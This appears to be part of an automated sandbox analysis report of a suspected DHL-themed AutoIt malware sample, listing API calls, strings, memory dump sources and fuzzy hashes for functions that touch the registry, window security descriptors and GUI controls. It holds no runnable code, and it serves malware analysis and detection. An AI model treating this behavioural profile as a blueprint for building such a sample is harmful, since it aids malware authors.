                                                                                            • _wcslen.LIBCMT ref: 008B031F
                                                                                            • _wcslen.LIBCMT ref: 008B0389
                                                                                            • _wcslen.LIBCMT ref: 008B03F1
                                                                                            • _wcslen.LIBCMT ref: 008B0475
                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008B04C5
                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008B0504
                                                                                              • Part of subcall function 0083F9F2: _wcslen.LIBCMT ref: 0083F9FD
                                                                                              • Part of subcall function 0088223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00882258
                                                                                              • Part of subcall function 0088223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0088228A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                            • API String ID: 1103490817-719923060
                                                                                            • Opcode ID: 8e3b07496623fb94559b4bc4c52d5036a34f9e25abcb8e8841a9f574a15ed05f
                                                                                            • Instruction ID: f30e3c9ea41b019998cca4ca9a893ae70aac8ee5d8b2de448b4f9e6ffef4bfec
                                                                                            • Opcode Fuzzy Hash: 8e3b07496623fb94559b4bc4c52d5036a34f9e25abcb8e8841a9f574a15ed05f
                                                                                            • Instruction Fuzzy Hash: A9E18D312083558BC724DF28D55096BB7E5FF99318B14455CF896EB3A2DB30ED45CB82
                                                                                            APIs
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00838968
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00838970
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0083899B
                                                                                            • GetSystemMetrics.USER32(00000008), ref: 008389A3
                                                                                            • GetSystemMetrics.USER32(00000004), ref: 008389C8
                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008389E5
                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008389F5
                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00838A28
                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00838A3C
                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00838A5A
                                                                                            • GetStockObject.GDI32(00000011), ref: 00838A76
                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00838A81
                                                                                              • Part of subcall function 0083912D: GetCursorPos.USER32(?), ref: 00839141
                                                                                              • Part of subcall function 0083912D: ScreenToClient.USER32(00000000,?), ref: 0083915E
                                                                                              • Part of subcall function 0083912D: GetAsyncKeyState.USER32(00000001), ref: 00839183
                                                                                              • Part of subcall function 0083912D: GetAsyncKeyState.USER32(00000002), ref: 0083919D
                                                                                            • SetTimer.USER32(00000000,00000000,00000028,008390FC), ref: 00838AA8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                            • String ID: AutoIt v3 GUI
                                                                                            • API String ID: 1458621304-248962490
                                                                                            • Opcode ID: aac56a2cff718a83173a6095c7b3f7da4e97a23b2e5fa36d520c5ad520208eb0
                                                                                            • Instruction ID: 3c60753b8da929924323be31de87b0ad36320ac8e9991d176114a2ab0e27b94d
                                                                                            • Opcode Fuzzy Hash: aac56a2cff718a83173a6095c7b3f7da4e97a23b2e5fa36d520c5ad520208eb0
                                                                                            • Instruction Fuzzy Hash: E3B13971A0020ADFDF14DFA8CD49BAA7BA5FB48354F108229FA15E7294DB74E850CB91
                                                                                            APIs
                                                                                              • Part of subcall function 008810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00881114
                                                                                              • Part of subcall function 008810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881120
                                                                                              • Part of subcall function 008810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 0088112F
                                                                                              • Part of subcall function 008810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881136
                                                                                              • Part of subcall function 008810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0088114D
                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00880DF5
                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00880E29
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00880E40
                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00880E7A
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00880E96
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00880EAD
                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00880EB5
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00880EBC
                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00880EDD
                                                                                            • CopySid.ADVAPI32(00000000), ref: 00880EE4
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00880F13
                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00880F35
                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00880F47
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880F6E
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880F75
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880F7E
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880F85
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880F8E
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880F95
                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00880FA1
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880FA8
                                                                                              • Part of subcall function 00881193: GetProcessHeap.KERNEL32(00000008,00880BB1,?,00000000,?,00880BB1,?), ref: 008811A1
                                                                                              • Part of subcall function 00881193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00880BB1,?), ref: 008811A8
                                                                                              • Part of subcall function 00881193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00880BB1,?), ref: 008811B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                            • String ID:
                                                                                            • API String ID: 4175595110-0
                                                                                            • Opcode ID: 6571b1d54e5c3076ba6182b46db217bd795fca4c7973c1bc51a00e693167b964
                                                                                            • Instruction ID: 47c3ed3dd8f2d3341a687dfa9524cd0445198bfac27f5224965a67ebc48ff926
                                                                                            • Opcode Fuzzy Hash: 6571b1d54e5c3076ba6182b46db217bd795fca4c7973c1bc51a00e693167b964
                                                                                            • Instruction Fuzzy Hash: 47715E7190420AABDF60AFA4DC48FAEBBB8FF05350F148215FA59E6191DB719909CF60
                                                                                            APIs
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008AC4BD
                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,008BCC08,00000000,?,00000000,?,?), ref: 008AC544
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 008AC5A4
                                                                                            • _wcslen.LIBCMT ref: 008AC5F4
                                                                                            • _wcslen.LIBCMT ref: 008AC66F
                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 008AC6B2
                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 008AC7C1
                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 008AC84D
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008AC881
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008AC88E
                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 008AC960
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                            • API String ID: 9721498-966354055
                                                                                            • Opcode ID: a18865a08d175e52570e0580d4d1c5d17808d1d0be671560ac09d653eb7bb72d
                                                                                            • Instruction ID: 217dcab8158d6ae91ecddbce245f8470dc6e44093aac99e4621e9ad3ca3290c9
                                                                                            • Opcode Fuzzy Hash: a18865a08d175e52570e0580d4d1c5d17808d1d0be671560ac09d653eb7bb72d
                                                                                            • Instruction Fuzzy Hash: 011278356042119FDB14DF19D881A2AB7E5FF89714F04886CF89ADB7A2DB35EC41CB82
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 008B09C6
                                                                                            • _wcslen.LIBCMT ref: 008B0A01
                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008B0A54
                                                                                            • _wcslen.LIBCMT ref: 008B0A8A
                                                                                            • _wcslen.LIBCMT ref: 008B0B06
                                                                                            • _wcslen.LIBCMT ref: 008B0B81
                                                                                              • Part of subcall function 0083F9F2: _wcslen.LIBCMT ref: 0083F9FD
                                                                                              • Part of subcall function 00882BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00882BFA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                            • API String ID: 1103490817-4258414348
                                                                                            • Opcode ID: 540b59b8d1a490325614e90f419cf208fd7275235f3e3bd8f2fd5f62d0a72379
                                                                                            • Instruction ID: 372007cc91bfe2f6674a3e0db2338c3811b00633ed5547521934e11afb192905
                                                                                            • Opcode Fuzzy Hash: 540b59b8d1a490325614e90f419cf208fd7275235f3e3bd8f2fd5f62d0a72379
                                                                                            • Instruction Fuzzy Hash: 32E168312083518FC714EF29C45096ABBE1FF99358B14895DF896EB3A2DB31ED45CB82
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                            • API String ID: 1256254125-909552448
                                                                                            • Opcode ID: 7172912a2b4a9fb22247f9ca502a4857b0755248508e4b8e8eb0a305dcfd5428
                                                                                            • Instruction ID: b930ebf7adfac22819056f42f4db287908aec2c9c93ea5e154a798e8c5470e3d
                                                                                            • Opcode Fuzzy Hash: 7172912a2b4a9fb22247f9ca502a4857b0755248508e4b8e8eb0a305dcfd5428
                                                                                            • Instruction Fuzzy Hash: 5F71047260017A8BEB20DE7CCC416BA3791FB62764F150124F866DB694EA35DD86C3A1
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 008B835A
                                                                                            • _wcslen.LIBCMT ref: 008B836E
                                                                                            • _wcslen.LIBCMT ref: 008B8391
                                                                                            • _wcslen.LIBCMT ref: 008B83B4
                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008B83F2
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008B5BF2), ref: 008B844E
                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008B8487
                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008B84CA
                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008B8501
                                                                                            • FreeLibrary.KERNEL32(?), ref: 008B850D
                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008B851D
                                                                                            • DestroyIcon.USER32(?,?,?,?,?,008B5BF2), ref: 008B852C
                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008B8549
                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008B8555
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                            • String ID: .dll$.exe$.icl
                                                                                            • API String ID: 799131459-1154884017
                                                                                            • Opcode ID: 1bbf9f903b5af504b2616683eca62b30f2862d3c88fc23142b3cf51aeb7bc313
                                                                                            • Instruction ID: d470b8a6e70f11fde956a4c7f0893289102f5176856fb012347db9a1bbe43ede
                                                                                            • Opcode Fuzzy Hash: 1bbf9f903b5af504b2616683eca62b30f2862d3c88fc23142b3cf51aeb7bc313
                                                                                            • Instruction Fuzzy Hash: CC619D71540619FAEB24DF68DC81BFE7BACFB08B11F104609F815D62D1DB74A980DBA0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                            • API String ID: 0-1645009161
                                                                                            • Opcode ID: fc4737c1e403eff147373dc5c2ba30800057a06a0ef16627d07df17c2329a908
                                                                                            • Instruction ID: a552580d651358feb62bc8fcb35d37cfda243ecef22123fc14bbe316d16d0474
                                                                                            • Opcode Fuzzy Hash: fc4737c1e403eff147373dc5c2ba30800057a06a0ef16627d07df17c2329a908
                                                                                            • Instruction Fuzzy Hash: 7E81E871604229BFDB20AF65EC52FAE37A8FF55300F044025F905EA296EB74DA91C792
                                                                                            APIs
                                                                                            • LoadIconW.USER32(00000063), ref: 00885A2E
                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00885A40
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00885A57
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00885A6C
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00885A72
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00885A82
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00885A88
                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00885AA9
                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00885AC3
                                                                                            • GetWindowRect.USER32(?,?), ref: 00885ACC
                                                                                            • _wcslen.LIBCMT ref: 00885B33
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00885B6F
                                                                                            • GetDesktopWindow.USER32 ref: 00885B75
                                                                                            • GetWindowRect.USER32(00000000), ref: 00885B7C
                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00885BD3
                                                                                            • GetClientRect.USER32(?,?), ref: 00885BE0
                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00885C05
                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00885C2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 895679908-0
                                                                                            • Opcode ID: 31e48a402912ec5e4bfd4b099de07462d1567aafe14a97143365035b442fb64f
                                                                                            • Instruction ID: b975a944554a171d4eb05ad739750de09c4b4ddd24c8ef03257936ab651b85df
                                                                                            • Opcode Fuzzy Hash: 31e48a402912ec5e4bfd4b099de07462d1567aafe14a97143365035b442fb64f
                                                                                            • Instruction Fuzzy Hash: 67716E31900B09AFDB20EFA8CE85EAEBBF5FF58714F104618E582E65A0D775E944CB50
                                                                                            APIs
                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 008400C6
                                                                                              • Part of subcall function 008400ED: InitializeCriticalSectionAndSpinCount.KERNEL32(008F070C,00000FA0,AF9074CE,?,?,?,?,008623B3,000000FF), ref: 0084011C
                                                                                              • Part of subcall function 008400ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,008623B3,000000FF), ref: 00840127
                                                                                              • Part of subcall function 008400ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,008623B3,000000FF), ref: 00840138
                                                                                              • Part of subcall function 008400ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0084014E
                                                                                              • Part of subcall function 008400ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0084015C
                                                                                              • Part of subcall function 008400ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0084016A
                                                                                              • Part of subcall function 008400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00840195
                                                                                              • Part of subcall function 008400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008401A0
                                                                                            • ___scrt_fastfail.LIBCMT ref: 008400E7
                                                                                              • Part of subcall function 008400A3: __onexit.LIBCMT ref: 008400A9
                                                                                            Strings
                                                                                            • kernel32.dll, xrefs: 00840133
                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00840122
                                                                                            • InitializeConditionVariable, xrefs: 00840148
                                                                                            • WakeAllConditionVariable, xrefs: 00840162
                                                                                            • SleepConditionVariableCS, xrefs: 00840154
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                            • API String ID: 66158676-1714406822
                                                                                            • Opcode ID: 5b88fa48070d0b560962a3f4cd85c14d51d054ab033ec0c98aafc074c3e23b40
                                                                                            • Instruction ID: e9ff88985b9e71ec2c17fae6b322d3a94541e2b4653fc1466cdab484c8095310
                                                                                            • Opcode Fuzzy Hash: 5b88fa48070d0b560962a3f4cd85c14d51d054ab033ec0c98aafc074c3e23b40
                                                                                            • Instruction Fuzzy Hash: 6021F932A447186FD7106B78AC45B6B37D8FB44B51F040639FB11E6393DB7898008EA1
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                            • API String ID: 176396367-1603158881
                                                                                            • Opcode ID: 888508e003491c5539d1ddaa371dd190424a0e2e64f8283781e255a55c758128
                                                                                            • Instruction ID: ec6935ed2f3a57fbd0a3f87d07969f55b38f12d450ff15b83784883508782707
                                                                                            • Opcode Fuzzy Hash: 888508e003491c5539d1ddaa371dd190424a0e2e64f8283781e255a55c758128
                                                                                            • Instruction Fuzzy Hash: 0DE1E631A0052AABCB18EFA8C4517EEBBB0FF54B14F548129E456F7240DB70AF858790
                                                                                            APIs
                                                                                            • CharLowerBuffW.USER32(00000000,00000000,008BCC08), ref: 00894527
                                                                                            • _wcslen.LIBCMT ref: 0089453B
                                                                                            • _wcslen.LIBCMT ref: 00894599
                                                                                            • _wcslen.LIBCMT ref: 008945F4
                                                                                            • _wcslen.LIBCMT ref: 0089463F
                                                                                            • _wcslen.LIBCMT ref: 008946A7
                                                                                              • Part of subcall function 0083F9F2: _wcslen.LIBCMT ref: 0083F9FD
                                                                                            • GetDriveTypeW.KERNEL32(?,008E6BF0,00000061), ref: 00894743
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
